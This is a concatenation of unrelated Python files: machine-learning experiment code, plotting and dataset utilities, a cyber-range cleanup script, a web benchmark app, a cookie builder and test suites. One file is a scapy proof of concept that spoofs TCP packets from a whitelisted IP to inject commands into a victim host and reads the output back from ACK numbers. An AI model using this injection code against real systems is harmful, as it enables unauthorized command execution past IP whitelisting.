experiment_name = experiment_name + "/" + classifier_name + "-split-" + split
# create filename that will be later used to store whole population
all_population_file = os.path.join(experiment_name, "all_individuals.csv")
# initialize classifier; some classifiers have random elements, and
# for our purpose, we are working with a specific instance, so we fix
# the classifier's behavior with a random seed
if classifier_type == 1: classifier = classifier_class(random_state=seed)
else : classifier = classifier_class()
# initialize pseudo-random number generation
prng = random.Random()
prng.seed(seed)
print("Computing initial classifier performance...")
referenceClassifier = copy.deepcopy(classifier)
referenceClassifier.fit(X_train, y_train)
y_train_pred = referenceClassifier.predict(X_train)
y_test_pred = referenceClassifier.predict(X_test)
y_pred = referenceClassifier.predict(X)
trainAccuracy = accuracy_score(y_train, y_train_pred)
testAccuracy = accuracy_score(y_test, y_test_pred)
overallAccuracy = accuracy_score(y, y_pred)
print("Initial performance: train=%.4f, test=%.4f, overall=%.4f" % (trainAccuracy, testAccuracy, overallAccuracy))
print("\nSetting up evolutionary algorithm...")
ea = inspyred.ec.emo.NSGA2(prng)
ea.variator = [ variate ]
ea.terminator = inspyred.ec.terminators.generation_termination
ea.observer = observeCoreSets
final_population = ea.evolve(
generator = generateCoreSets,
evaluator = evaluateCoreSets,
pop_size = pop_size,
num_selected = offspring_size,
maximize = maximize,
max_generations = max_generations,
# extra arguments here
n_classes = number_classes,
classifier = classifier,
X=X,
y=y,
X_train = X_train,
y_train = y_train,
X_test = X_test,
y_test = y_test,
min_points_in_core_set = min_points_in_core_set,
max_points_in_core_set = max_points_in_core_set,
experimentName = experiment_name,
all_population_file = all_population_file,
current_time = datetime.datetime.now()
)
final_archive = sorted(ea.archive, key = lambda x : x.fitness[1])
return final_archive, trainAccuracy, testAccuracy
def setup_logger(name, log_file, level=logging.INFO):
"""Function setup as many loggers as you want"""
formatter = logging.Formatter('%(asctime)s %(message)s')
handler = logging.FileHandler(log_file)
handler.setFormatter(formatter)
logger = logging.getLogger(name)
logger.setLevel(level)
logger.addHandler(handler)
return logger
# utility function to load the covtype dataset
def loadForestCoverageType() :
inputFile = "../data/covtype.csv"
#logger.info("Loading file \"" + inputFile + "\"...")
df_covtype = read_csv(inputFile, delimiter=',', header=None)
# class is the last column
covtype = df_covtype.as_matrix()
X = covtype[:,:-1]
y = covtype[:,-1].ravel()-1
return X, y
def loadMNIST():
mnist = tf.keras.datasets.mnist
(x_train, y_train),(x_test, y_test) = mnist.load_data()
X = np.concatenate((x_train, x_test))
X = np.reshape(X, (X.shape[0], X.shape[1] * X.shape[1]))
y = np.concatenate((y_train, y_test))
return X, y
def make_meshgrid(x, y, h=.02):
x_min, x_max = x.min() - 1, x.max() + 1
y_min, y_max = y.min() - 1, y.max() + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
return xx, yy
def plot_contours(clf, xx, yy, **params):
Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
out = plt.contour(xx, yy, Z, **params)
return out, Z
def evaluate_core(X_core, y_core, X, y, classifier, cname=None, SEED=0):
if cname == "SVC":
referenceClassifier = copy.deepcopy(classifier(random_state=SEED, probability=True))
else:
referenceClassifier = copy.deepcopy(classifier(random_state=SEED))
referenceClassifier.fit(X_core, y_core)
y_pred = referenceClassifier.predict(X)
fail_points = y != y_pred
X_err = X[fail_points]
accuracy = accuracy_score( y, y_pred)
return X_err, accuracy, referenceClassifier, fail_points, y_pred
# initial random generation of core sets (as binary strings)
def generateCoreSets(random, args) :
individual_length = args["X_train"].shape[0] + args["X_train"].shape[1]
individual = [0] * individual_length
points_in_core_set = random.randint( args["min_points_in_core_set"], args["max_points_in_core_set"] )
for i in range(points_in_core_set) :
random_index = random.randint(0, args["X_train"].shape[0]-1)
individual[random_index] = 1
features_in_core_set = random.randint( 1, args["X_train"].shape[1] )
for i in range(features_in_core_set) :
random_index = random.randint(args["X_train"].shape[0], individual_length-1)
individual[random_index] = 1
return individual
# using inspyred's notation, here is a single operator that performs both
# crossover and mutation, sequentially
@inspyred.ec.variators.crossover
def variate(random, parent1, parent2, args) :
# well, for starters we just crossover two individuals, then mutate
children = [ list(parent1), list(parent2) ]
# one-point crossover!
cutPoint = random.randint(0, len(children[0])-1)
for index in range(0, cutPoint+1) :
temp = children[0][index]
children[0][index] = children[1][index]
children[1][index] = temp
# mutate!
for child in children :
mutationPoint = random.randint(0, len(child)-1)
if child[mutationPoint] == 0 :
child[mutationPoint] = 1
else :
child[mutationPoint] = 0
# check if individual is still valid, and (in case it isn't) repair it
for child in children :
if args.get("max_points_in_core_set", None) != None and args.get("min_points_in_core_set", None) != None :
points_in_core_set = [ index for index, value in enumerate(child) if value == 1 and index < args["X_train"].shape[0] ]
while len(points_in_core_set) > args["max_points_in_core_set"] :
index = random.choice( points_in_core_set )
child[index] = 0
points_in_core_set = [ index for index, value in enumerate(child) if value == 1 ]
if len(points_in_core_set) < args["min_points_in_core_set"] :
index = random.choice( [ index for index, value in enumerate(child) if value == 0 ] )
child[index] = 1
points_in_core_set = [ index for index, value in enumerate(child) if value == 1 ]
features_in_core_set = [ index for index, value in enumerate(child) if value == 1 and index > args["X_train"].shape[0] ]
if len(features_in_core_set) < 1 :
index = random.choice( [ index for index, value in enumerate(child) if value == 0 and index > args["X_train"].shape[0] ] )
child[index] = 1
features_in_core_set = [ index for index, value in enumerate(child) if value == 1 and index > args["X_train"].shape[0] ]
return children
# function that evaluates the core sets
def evaluateCoreSets(candidates, args) :
fitness = []
for c in candidates :
#print("candidate:", c)
cAsBoolArray = np.array(c, dtype=bool)
cPoints = cAsBoolArray[ :args["X_train"].shape[0] ]
cFeatures = cAsBoolArray[ args["X_train"].shape[0]: ]
X_train_reduced = args["X_train"][cPoints, :]
X_train_reduced = X_train_reduced[:, cFeatures]
y_train_reduced = args["y_train"][cPoints]
#print("Reduced training set:", X_train_reduced.shape[0])
#print("Reduced training set:", y_train_reduced.shape[0])
if len(set(y_train_reduced)) == args["n_classes"] :
classifier = copy.deepcopy( args["classifier"] )
classifier.fit(X_train_reduced, y_train_reduced)
# evaluate accuracy for every point (training, test)
X_train = args["X_train"]
y_pred_train = classifier.predict( X_train[:, cFeatures] )
#y_pred_test = classifier.predict( args["X_test"] )
#y_pred = np.concatenate((y_pred_train, y_pred_test))
#y = np.concatenate((args["y_train"], args["y_test"]))
#accuracy = accuracy_score(y, y_pred)
accuracy = accuracy_score(args["y_train"], y_pred_train)
error = round(1-accuracy, 4)
# also store valid individual
# all_population_file = args.get("all_population_file", None)
# if all_population_file != None :
#
# # if the file does not exist, write header
# if not os.path.exists(all_population_file) :
# with open(all_population_file, "w") as fp :
# fp.write("#points,accuracy,individual\n")
#
# # in any case, append individual
# with open(all_population_file, "a") as fp :
# fp.write( str(len([ x for x in c if x == 1])) )
# fp.write( "," + str(accuracy) )
#
# for g in c :
# fp.write( "," + str(g) )
# fp.write("\n")
else:
# individual gets a horrible fitness value
maximize = args["_ec"].maximize # let's fetch the bool that tells us if we are maximizing or minimizing
if maximize == True :
error = -np.inf
else :
error = np.inf
# maximizing the points removed also means minimizing the number of points taken (LOL)
corePoints = sum(cPoints)
coreFeatures = sum(cFeatures)
fitness.append( inspyred.ec.emo.Pareto( [corePoints, coreFeatures, error] ) )
return fitness
# the 'observer' function is called by inspyred algorithms at the end of every generation
def observeCoreSets(population, num_generations, num_evaluations, args) :
# training_set_size = args["X_train"].shape[0]
old_time = args["current_time"]
current_time = datetime.datetime.now()
delta_time = current_time - old_time
# I don't like the 'timedelta' string format, so here is some fancy formatting
delta_time_string = str(delta_time)[:-7] + "s"
print("[%s] Generation %d, Random individual: #samples=%d, #features=%d, error=%.2f" % (delta_time_string, num_generations, population[0].fitness[0], population[0].fitness[1], population[0].fitness[2]))
args["current_time"] = current_time
return
if __name__ == "__main__" :
# dataList = [
# ["blobs", 200, 1000],
# ["circles", 200, 1000],
# ["moons", 200, 1000],
# ["iris4", 200, 1000],
# ["iris2", 500, 500],
# ["digits", 200, 1000],
# #["covtype", 10, 5],
# #["mnist", 10, 5],
# ]
dataList = [
# ["blobs", 200, 200],
# ["circles", 200, 200],
# ["moons", 200, 200],
# ["iris4", 20, 20],
# ["iris2", 200, 200],
# ["digits", 200, 200],
# ["wine", 200, 200],
# ["breast", 200, 200],
# ["pairs", 200, 200],
# ["olivetti", 200, 200],
# ["covtype", 200, 200],
# ["mnist", 200, 200],
# ["plants", 200, 200],
# ["isolet", 200, 200],
# ["ctg", 200, 200],
# ["ozone", 200, 200],
# ["ilpd", 200, 200],
# ["biodeg", 200, 200],
# ["hill-valley", 200, 200],
]
# dataList = [
# ["blobs", 100, 100],
# ["circles", 100, 100],
# ["moons", 100, 100],
# ["iris4", 100, 100],
# ["iris2", 100, 100],
# ["digits", 100, 100],
# ["covtype", 100, 100],
# ["mnist", 100, 100],
# ]
for dataset in dataList:
main(dataset[0], dataset[1], dataset[2])
sys.exit()
|
# rndly.py
import numpy as np
import time
class RNDLy:
def __init__(self):
self.name = 'rndly'
def predict(self,queryList):
lo = 0.0
hi = 1.0
n = len(queryList)
preds = np.random.uniform(lo,hi,n)
preds = preds.tolist()
time.sleep(0.5)
return preds
def close(self):
pass
|
from .YelpAPI import YelpAuth
from .YelpAPI import YelpAPI
from .HereAPI import HereAuth
from .HereAPI import HereAPI
|
#!/usr/bin/python
#############################################################################
# Range cleanup program
#############################################################################
import os
import sys
import subprocess
import logging
import parse_config
logging.basicConfig(level=logging.INFO, format='* %(levelname)s: %(filename)s: %(message)s')
# Default values for the essential parameters
RANGE_ID = 123
CYRIS_PATH = "/home/cyuser/cyris/"
RANGE_PATH = "/home/cyuser/cyris/cyber_range/"
# Constants
SETTINGS_DIR = "settings/"
DESTRUCTION_SCRIPT1 = "whole-controlled-destruction.sh"
DESTRUCTION_SCRIPT2 = "destruct_cyberrange.sh" # Not used yet
# Try to call the range destruction script prepared by CyRIS
# Return True on success, False on failure, or if the script does not exist
def range_destruction(range_id, range_path):
# Create the full name of the destruction script
destruction_script_full = "{0}{1}/{2}".format(range_path, range_id, DESTRUCTION_SCRIPT1)
if os.path.isfile(destruction_script_full):
# Try to call the script
logging.debug("Use destruction script: " + destruction_script_full)
exit_value = subprocess.call(["bash", destruction_script_full])
if exit_value == 0:
return True
# Code below is not working for some reason, but we'll try again in the future to enable it,
# as the script "destruct_cyberrange.sh" is created earlier than "whole-controlled-destruction.sh",
# hence it could be used instead for forceful cleanup
# else:
# destruction_script_full = "{0}{1}/{2}".format(range_path, range_id, DESTRUCTION_SCRIPT2)
# if os.path.isfile(destruction_script_full):
# # Try to call the script
# logging.debug("Use destruction script: " + destruction_script_full)
# exit_value = subprocess.call(["bash", destruction_script_full])
# if exit_value == 0:
# return True
logging.warning("Destruction script not found or error.")
return False
# Forceful cleanup of storage (relevant files and directories)
def storage_cleanup(range_id, cyris_path, range_path):
# Create the range directory name
range_dir = "{0}{1}/".format(range_path, range_id)
# Try to call the script
logging.info("Clean up range directory: " + range_dir)
# Run rm command (should use confirmation?)
subprocess.call(["rm", "-rf", range_dir])
# TODO: clean up special files in settings: 123pssh.txt, etc.
pscp_filename = "{0}{1}{2}pscp_host.txt".format(cyris_path, SETTINGS_DIR, range_id)
pssh_filename = "{0}{1}{2}pssh_host.txt".format(cyris_path, SETTINGS_DIR, range_id)
logging.info("Clean up range host files: " + pscp_filename + " and " + pssh_filename)
subprocess.call(["rm", "-f", pscp_filename])
subprocess.call(["rm", "-f", pssh_filename])
# Forceful cleanup via KVM virsh
def kvm_cleanup(range_id):
range_string = "_cr{}_".format(range_id)
command = "virsh list --all"
output = subprocess.check_output(command, shell=True)
lines = output.splitlines()
cleanup_done = False
logging.info("Clean up KVM domains containing 'cr{}'.".format(range_id))
for line in lines:
if range_string in line:
fields = line.split()
for field in fields:
if range_string in field:
cleanup_done = True
subprocess.call(["virsh", "destroy", field])
subprocess.call(["virsh", "undefine", field])
if not cleanup_done:
logging.warning("No relevant KVM domains found.")
# Forceful network cleanup
def network_cleanup(range_id):
logging.info("Clean up bridges containing 'br{}'.".format(range_id))
# TODO: Use ifconfig to determine all bridge names that start with br{range_id}
bridge_name = "br{}-1-1".format(range_id)
try:
# Shut down bridge
ifdown_command = "sudo ifconfig {} down".format(bridge_name)
output = subprocess.check_output(ifdown_command, shell=True, stderr=subprocess.STDOUT)
# Delete bridge
brctl_command = "sudo brctl delbr {}".format(bridge_name)
output = subprocess.check_output(brctl_command, shell=True, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as error:
logging.warning("Error when removing bridge {}.\n Error message: {}"
.format(bridge_name, error.output.rstrip()))
def main(argv):
# Assign default values
range_id = RANGE_ID
cyris_path = CYRIS_PATH
range_path = RANGE_PATH
if len(argv) >= 1:
# First argument (if exists) is range id
range_id = argv[0]
if len(argv) >= 2:
# Second argument (if exists) is config file name
config_file = argv[1]
cyris_path_parsed, range_path_parsed, p2, p3, p4, p5, p6 = parse_config.parse_config(config_file)
if cyris_path_parsed:
cyris_path = cyris_path_parsed
if range_path_parsed:
range_path = range_path_parsed
# Handle case when directory names don't end with "/"
if not cyris_path.endswith("/"):
cyris_path += "/"
if not range_path.endswith("/"):
range_path += "/"
logging.info("Do cleanup for range #{0}.".format(range_id))
# First we try the normal range destruction
logging.info("Use scripts generated when the range was created.")
did_destroy = range_destruction(range_id, range_path)
# Then we do cleanup via KVM virsh in case normal destruction failed
if not did_destroy:
logging.info("Script execution failed => do forceful cleanup.")
logging.debug("- Clean up storage")
storage_cleanup(range_id, cyris_path, range_path)
logging.debug("- Clean up KVM files")
kvm_cleanup(range_id)
logging.debug("- Clean up network settings")
network_cleanup(range_id)
if __name__ == '__main__':
main(sys.argv[1:])
|
import os
ROOT_DIR = os.path.dirname(os.path.abspath(__file__)) # This is your Project Root
DATA_DIR = os.path.join(ROOT_DIR, 'data')
|
import numpy
import plotly.figure_factory as figure_factory
import plotly.graph_objs as graph_objs
import plotly.offline as offline
# Configure plotly to run in offline mode
offline.init_notebook_mode(connected=False)
def make_bar_chart(columns, title='', x_axis=''):
"""Takes an array of dictionaries that have the keys 'column' and 'score'.
The value for the 'column' key is a string representing the name of the
column.
The value for the 'score' key is an integer.
"""
short_names = (column['column'][:40] for column in columns)
truncated_names = [
'{}…'.format(name) if len(name) > 40 else name for name in short_names
]
scores = [column['score'] for column in columns]
data = [graph_objs.Bar(x=scores, y=truncated_names, orientation='h')]
layout = graph_objs.Layout(
margin=graph_objs.layout.Margin(),
title=title,
yaxis=dict(
tickfont=dict(size=9, color='rgb(107, 107, 107)'),
tickangle=30,
automargin=True),
xaxis=dict(title=x_axis))
return graph_objs.Figure(data=data, layout=layout)
def make_choropleth(fips=[],
values=[],
title='',
legend_title=None,
color_scale=None):
assert len(fips) == len(values)
default_color_scale = [
'#f7fbff', '#ebf3fb', '#deebf7', '#d2e3f3', '#c6dbef', '#b3d2e9',
'#9ecae1', '#85bcdb', '#6baed6', '#57a0ce', '#4292c6', '#3082be',
'#2171b5', '#1361a9', '#08519c', '#0b4083', '#08306b'
]
default_color_scale.reverse()
color_scale = color_scale or default_color_scale
binning_endpoints = list(
numpy.linspace(min(values), max(values),
len(color_scale) - 1))
return figure_factory.create_choropleth(
fips=fips,
values=values,
scope=['usa'],
colorscale=color_scale,
binning_endpoints=binning_endpoints,
county_outline={
'color': 'rgb(15, 15, 55)',
'width': 0.5
},
show_hover=True,
centroid_marker=dict(opacity=0),
asp=2.9,
title=title,
showlegend=(legend_title is not None),
**(dict(legend_title=legend_title) if legend_title else {}))
def make_scatterplot(xs=[], ys=[], text=[], title='', x_axis='', y_axis=''):
assert len(xs) == len(ys) == len(text)
trace = graph_objs.Scatter(x=xs, y=ys, text=text, mode='markers')
layout = graph_objs.Layout(
title=title,
hovermode='closest',
xaxis=dict(title=x_axis),
yaxis=dict(title=y_axis),
showlegend=False)
return graph_objs.Figure(data=[trace], layout=layout)
|
#!/usr/bin/env python3
"""Parse a directory contains Librispeech dataset.
Recursively search for "*.trans.txt" file in the given directory and print out
`<ID>\\t<AUDIO_PATH>\\t<TRANSCRIPTION>`
example: python parse_librispeech.py LibriSpeech/test-clean
1089-134691-0000\t/LibriSpeech/test-clean/1089/134691/1089-134691-0000.flac\tHE COULD WAIT NO LONGER
...
Dataset can be obtained from https://www.openslr.org/12
"""
import argparse
from pathlib import Path
def _parse_args():
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawTextHelpFormatter,
)
parser.add_argument(
'input_dir',
type=Path,
help='Directory where `*.trans.txt` files are searched.'
)
return parser.parse_args()
def _parse_transcript(path):
with open(path) as trans_fileobj:
for line in trans_fileobj:
line = line.strip()
if line:
yield line.split(' ', maxsplit=1)
def _parse_directory(root_dir: Path):
for trans_file in root_dir.glob('**/*.trans.txt'):
trans_dir = trans_file.parent
for id_, transcription in _parse_transcript(trans_file):
audio_path = trans_dir / f'{id_}.flac'
yield id_, audio_path, transcription
def _main():
args = _parse_args()
for id_, path, transcription in _parse_directory(args.input_dir):
print(f'{id_}\t{path}\t{transcription}')
if __name__ == '__main__':
_main()
|
#!/usr/bin/env python
# DiabloHorn - QIBA_server_poc
# Bypassing IP whitelisting using quantum inject
import sys
import time
import socket
import collections
from scapy.all import *
"""
iptables -A OUTPUT -p tcp --tcp-flags RST RST -s <ip> -j DROP
"""
STATE_TEMP = []
CMD_DATA = collections.OrderedDict()
def pkt_inspect(pktdata):
#print repr(pktdata)
if pktdata.haslayer(TCP):
tcpdata = pktdata.getlayer(TCP)
#check if syn and ack flags are set
if ((tcpdata.flags >> 1) & 1) and ((tcpdata.flags >> 4) & 1):
if len(STATE_TEMP) == 2:
spkt = IP(src=sys.argv[1],dst=sys.argv[2]) / TCP(dport=STATE_TEMP[0].dport,sport=int(sys.argv[3]),flags='PA',seq=STATE_TEMP[1].ack-1,ack=STATE_TEMP[0].ack-1) / (sys.argv[4] + ':' + 'a'*(100-(len(sys.argv[4])+1)))
print 'Injecting::::::: %s' % repr(spkt)
#print repr(spkt)
send(spkt)
if len(STATE_TEMP) == 1:
if STATE_TEMP[0].ack != tcpdata.ack:
STATE_TEMP.append(tcpdata)
else:
STATE_TEMP.append(tcpdata)
def stopcheck(pktdata):
if pktdata.haslayer(TCP):
tcpdata = pktdata.getlayer(TCP)
if tcpdata.ack == 1 and tcpdata.dport == 31337:
return True
else:
return False
def data_recv(pktdata):
global CMD_DATA
if pktdata.haslayer(TCP):
#print pktdata.getlayer(TCP).ack-1
try:
encdata = '{:02x}'.format(pktdata.getlayer(TCP).ack-1).decode('hex')
if ((ord(encdata[0]) + ord(encdata[1]) + ord(encdata[2])) % 0xff) == ord(encdata[3]):
print "cmdoutput::::::: %s" % encdata[0:3]
CMD_DATA[pktdata.getlayer(TCP).seq] = encdata[0:3]
except TypeError:
pass
except IndexError:
pass
def stopdatarecv(pktdata):
if pktdata.haslayer(TCP):
try:
encdata = '{:02x}'.format(pktdata.getlayer(TCP).ack-1).decode('hex')
#print encdata
if encdata == "STOP":
return True
else:
return False
except TypeError:
pass
except IndexError:
pass
if __name__ == "__main__":
if len(sys.argv) != 5:
print "{} <whitelisted ip> <victim ip> <whitelisted port> <cmd>".format(sys.argv[0])
sys.exit()
sniff(iface="eth0",store=0,prn=pkt_inspect,filter="ip and host {}".format(sys.argv[1]), stop_filter=stopcheck)
sniff(iface="eth0",store=0,prn=data_recv,filter="ip and host {}".format(sys.argv[1]), stop_filter=stopdatarecv)
finalout = ''
for k,v in CMD_DATA.iteritems():
finalout += v
print finalout
|
import time
from uuid import uuid4
from emmett import App, request, response
from emmett.tools import service
app = App(__name__)
app.config.handle_static = False
@app.route(methods=["get"], output="str")
async def html():
"""Return HTML content and a custom header."""
response.headers["x-time"] = f"{time.time()}"
response.content_type = "text/html"
return "<b>HTML OK</b>"
@app.route(methods=["post"], output="str")
async def upload():
"""Load multipart data and store it as a file."""
data = (await request.files).file
if not data:
response.status = 400
return ""
target = f"/tmp/{uuid4().hex}"
await data.save(target)
return target
@app.route("/api/users/<int:user>/records/<int:record>", methods=["put"])
@service.json
async def api(user, record):
"""Check headers for authorization, load JSON/query data and return as JSON."""
if not request.headers.get("authorization"):
response.status = 401
return {}
return {
"params": {"user": user, "record": record},
"query": request.query_params,
"data": await request.body_params
}
|
import csv
from datetime import datetime
from lurge_types.group_report import GroupReport
from directory_config import REPORT_DIR
import logging
import logging.config
from lurge_types.user import UserReport
import typing as T
def createTsvReport(group_reports: T.Dict[str, T.List[GroupReport]], date: str, report_dir: str, logger: logging.Logger) -> None:
"""
Reads the contents of tables in tmp_db and writes them to a .tsv formatted
file.
:param group_reports: volume -> list of GroupReports for all the data we'll put in the report
:param date: Date string of the data to be used (ie, "2019-09-20")
"""
# sets filename to 'report-YYYYMMDD.tsv'
name = "report-{}.tsv".format(date.replace("-", ""))
with open(report_dir+"report-output-files/"+name, "w", newline="") as reportfile:
# start a writer that will format the file as tab-separated
report_writer = csv.writer(reportfile, delimiter="\t",
quoting=csv.QUOTE_NONE)
# write column headers
report_writer.writerow(["Lustre Volume", "PI", "Unix Group",
"Used (bytes)", "Quota (bytes)",
"Last Modified (days)", "Archived Directories", "Is Humgen?"])
logger.info("Adding data to tsv report")
for volume, reports in group_reports.items():
logger.debug("Inserting data for {}...".format(volume))
for report in reports:
data = ["-" if x == None else x for x in report.row]
report_writer.writerow(data)
logger.info("{} created.".format(name))
def create_tsv_user_report(user_reports: T.Dict[int, T.DefaultDict[str, UserReport]], usernames: T.Dict[int, str], user_groups: T.Dict[str, T.List[T.Tuple[str, str]]], logger: logging.Logger) -> None:
logger.info("Writing user report info to TSV file")
with open(f"{REPORT_DIR}user-reports/{datetime.today().strftime('%Y-%m-%d')}.tsv", "w", newline="") as rf:
writer = csv.writer(rf, delimiter="\t", quoting=csv.QUOTE_NONE)
writer.writerow(["username", "data", *user_reports.keys()])
for uid, uname in usernames.items():
for grp_name, gid in user_groups[str(uid)]:
writer.writerow([uname, "size", grp_name, *[
round(user_reports[vol][str(uid)].size[gid]/2 ** 20, 2)
if str(uid) in user_reports[vol] and gid in user_reports[vol][str(uid)].size else 0
for vol in user_reports
]])
writer.writerow([uname, "mtime", grp_name, *[
user_reports[vol][str(uid)]._mtime[gid].strftime(
'%Y-%m-%d')
if str(uid) in user_reports[vol] and gid in user_reports[vol][str(uid)]._mtime else "-"
for vol in user_reports
]])
logger.info("Done writing user report info to TSV file")
|
import arrow
from optional import Optional
from eynnyd.exceptions import InvalidCookieBuildException
from eynnyd.internal.utils.cookies import rfc
from eynnyd.internal.utils.cookies.response_cookie import ResponseCookie
class ResponseCookieBuilder:
"""
Response cookies are generally just key-value pairs but can be more complicated. Using this builder
allows for simple creation of generic or complex cookies with validation.
"""
def __init__(self, name, value):
"""
Constructs an initial ResponseCookieBuilder with common defaults.
:param name: a valid cookie name (via rfc spec)
:param value: a valid cookie value (via rfc spec)
"""
self._name = name
self._value = value
self._expires = Optional.empty()
self._max_age = Optional.empty()
self._domain = Optional.empty()
self._path = Optional.empty()
self._secure = True
self._http_only = True
def set_expires(self, expires):
"""
Sets the cookie to include an expiry date.
:param expires: a date, parsable by python Arrow
:return: This builder to allow for fluent design.
"""
try:
encoded = arrow.get(expires)
except arrow.parser.ParserError as e:
raise InvalidCookieBuildException("Invalid datetime {d}, unable to parse.".format(d=expires), e)
self._expires = Optional.of(encoded)
return self
def set_expires_in_days(self, days_till_expiry):
"""
Sets the cookie to include an expiry date in days from now.
:param days_till_expiry: number of days from now to the expiry time.
:return: This builder to allow for fluent design.
"""
try:
encoded = int(days_till_expiry)
except ValueError as e:
raise InvalidCookieBuildException("Invalid days {d}".format(d=days_till_expiry), e)
self._expires = Optional.of(arrow.utcnow().shift(days=encoded))
return self
def set_max_age(self, max_age):
"""
Sets the max age of the cookie.
:param max_age: an rfc compliant max age
:return: This builder to allow for fluent design.
"""
if not bool(rfc.VALID_RFC_MAX_AGE.fullmatch(str(max_age))):
raise InvalidCookieBuildException("Max Age {m} does not comply with RFC Cookies Specs.".format(m=max_age))
self._max_age = Optional.of(str(max_age))
return self
def set_domain(self, domain):
"""
Sets the limiting domain for the cookie.
:param domain: an rfc compliant domain
:return: This builder to allow for fluent design.
"""
if not bool(rfc.VALID_RFC_DOMAIN.fullmatch(domain)):
raise InvalidCookieBuildException("Domain {d} does not comply with RFC Cookie Specs.".format(d=domain))
self._domain = Optional.of(domain)
return self
def set_path(self, path):
"""
Sets the limiting path for the cookie.
:param path: an rfc compliant path
:return: This builder to allow for fluent design.
"""
if not bool(rfc.VALID_RFC_PATH.fullmatch(path)):
raise InvalidCookieBuildException("Path {p} does not comply with RFC Cookie Specs.".format(p=path))
self._path = Optional.of(path)
return self
def set_secure(self, secure):
"""
Sets whether the cookie is secure or not.
:param secure: a boolean to indicate if we are setting secure or insecure
:return: This builder to allow for fluent design.
"""
self._secure = bool(secure)
return self
def set_http_only(self, http_only):
"""
Sets whether the cookie is http only or not.
:param http_only: a boolean to indicate if we are setting http only or not
:return: This builder to allow for fluent design.
"""
self._http_only = bool(http_only)
return self
def build(self):
"""
Validates the name and value and builds the ResponseCookie object.
:return: a valid ResponseCookie object.
"""
if not bool(rfc.VALID_RFC_COOKIE_NAME.fullmatch(self._name)):
raise InvalidCookieBuildException("Cookie Name {n} does not comply with RFC Cookie Specs.".format(n=self._name))
if not bool(rfc.VALID_RFC_COOKIE_VALUE.fullmatch((self._value))):
raise InvalidCookieBuildException(
"Cookie Value {v} does not comply with RFC Cookie Specs.".format(v=self._value))
return ResponseCookie(
self._name,
self._value,
self._expires,
self._max_age,
self._domain,
self._path,
self._secure,
self._http_only)
|
# pylint: disable=missing-function-docstring,missing-module-docstring, protected-access
from unittest.mock import AsyncMock, patch
import pytest
from custom_components.hacs.base import HacsBase, HacsRepositories
from custom_components.hacs.enums import HacsDisabledReason
from custom_components.hacs.exceptions import HacsException
from custom_components.hacs.repositories.base import HacsRepository
@pytest.mark.asyncio
async def test_load_hacs_repository_exist(hacs: HacsBase, repository: HacsRepository):
await hacs.tasks.async_load()
task = hacs.tasks.get("load_hacs_repository")
assert task
assert not repository.data.installed
with patch(
"custom_components.hacs.base.HacsRepositories.get_by_full_name", return_value=repository
):
await task.execute_task()
assert repository.data.installed
@pytest.mark.asyncio
async def test_load_hacs_repository_register_failed(
hacs: HacsBase,
caplog: pytest.LogCaptureFixture,
):
await hacs.tasks.async_load()
task = hacs.tasks.get("load_hacs_repository")
assert task
assert not hacs.system.disabled
with patch("custom_components.hacs.base.HacsBase.async_register_repository", AsyncMock()):
await task.execute_task()
assert hacs.system.disabled
assert hacs.system.disabled_reason == HacsDisabledReason.LOAD_HACS
assert "[Unknown error] - Could not load HACS!" in caplog.text
@pytest.mark.asyncio
async def test_load_hacs_repository_register_failed_rate_limit(
hacs: HacsBase,
caplog: pytest.LogCaptureFixture,
):
await hacs.tasks.async_load()
task = hacs.tasks.get("load_hacs_repository")
assert task
assert not hacs.system.disabled
with patch(
"custom_components.hacs.base.HacsBase.async_register_repository",
side_effect=HacsException("ratelimit 403"),
):
await task.execute_task()
assert hacs.system.disabled
assert hacs.system.disabled_reason == HacsDisabledReason.LOAD_HACS
assert "GitHub API is ratelimited, or the token is wrong." in caplog.text
|
#!/usr/bin/env python3
from unittest import TestCase, main
from graph2tensor.model.data import EgoTensorGenerator, build_output_signature
from graph2tensor.model.data import build_sampling_table
from graph2tensor.model.data import SkipGramGenerator4DeepWalk
from graph2tensor.model.data import SkipGramGenerator4Node2Vec
from graph2tensor.model.data import SkipGramGenerator4MetaPath2Vec
from graph2tensor.client import NumpyGraph
import numpy as np
import tensorflow as tf
from test_utils import graph_setup
g = NumpyGraph()
class TestDataset(TestCase):
def test_1_setup(self):
graph_setup(g)
def test_egotensor_generator(self):
ids = np.arange(169343)
labels = np.random.randint(2, size=ids.shape[0], dtype=np.int32)
output_signature = build_output_signature(g.schema, ["(paper) -[cites]- (paper) -[cites]- (paper)"], False)
with EgoTensorGenerator(
graph=g,
meta_paths=["(paper) -[cites]- (paper) -[cites]- (paper)"],
sampler_process_num=1,
converter_process_num=1,
expand_factors=2,
strategies="random",
include_edge=False) as data_gen:
ds = tf.data.Dataset.from_generator(
data_gen,
args=(ids, 1024, False, labels),
output_signature=output_signature
).repeat(2)
for _ in ds:
pass
def test_skipgram_generator_deepwalk(self):
ids = np.arange(169343)
sampling_table = build_sampling_table(g, 'cites')
with SkipGramGenerator4DeepWalk(
graph=g,
edge_type='cites',
vocabulary_size=169343,
negative_samples=4,
sampling_table=sampling_table) as data_gen:
ds = tf.data.Dataset.from_generator(
data_gen,
args=(ids, 1024),
output_signature=((tf.TensorSpec(shape=(None,), dtype=tf.int64), tf.TensorSpec(shape=(None, 4+1), dtype=tf.int64)),
tf.TensorSpec(shape=(None, 4+1), dtype=tf.int32))
).repeat(2)
for _ in ds:
pass
def test_skipgram_generator_node2vec(self):
ids = np.arange(169343)
sampling_table = build_sampling_table(g, 'cites')
with SkipGramGenerator4Node2Vec(
graph=g,
edge_type='cites',
vocabulary_size=169343,
negative_samples=4,
sampling_table=sampling_table) as data_gen:
ds = tf.data.Dataset.from_generator(
data_gen,
args=(ids, 1024),
output_signature=((tf.TensorSpec(shape=(None,), dtype=tf.int64), tf.TensorSpec(shape=(None, 4+1), dtype=tf.int64)),
tf.TensorSpec(shape=(None, 4+1), dtype=tf.int32))
).repeat(2)
for _ in ds:
pass
def test_skipgram_generator_metapath2vec(self):
ids = np.arange(169343)
sampling_table = build_sampling_table(g, 'cites')
with SkipGramGenerator4MetaPath2Vec(
graph=g,
meta_path="(paper) -[cites]- (paper) -[cites]- (paper)",
walk_length=6,
vocabulary_size=169343,
negative_samples=4,
sampling_table=sampling_table) as data_gen:
ds = tf.data.Dataset.from_generator(
data_gen,
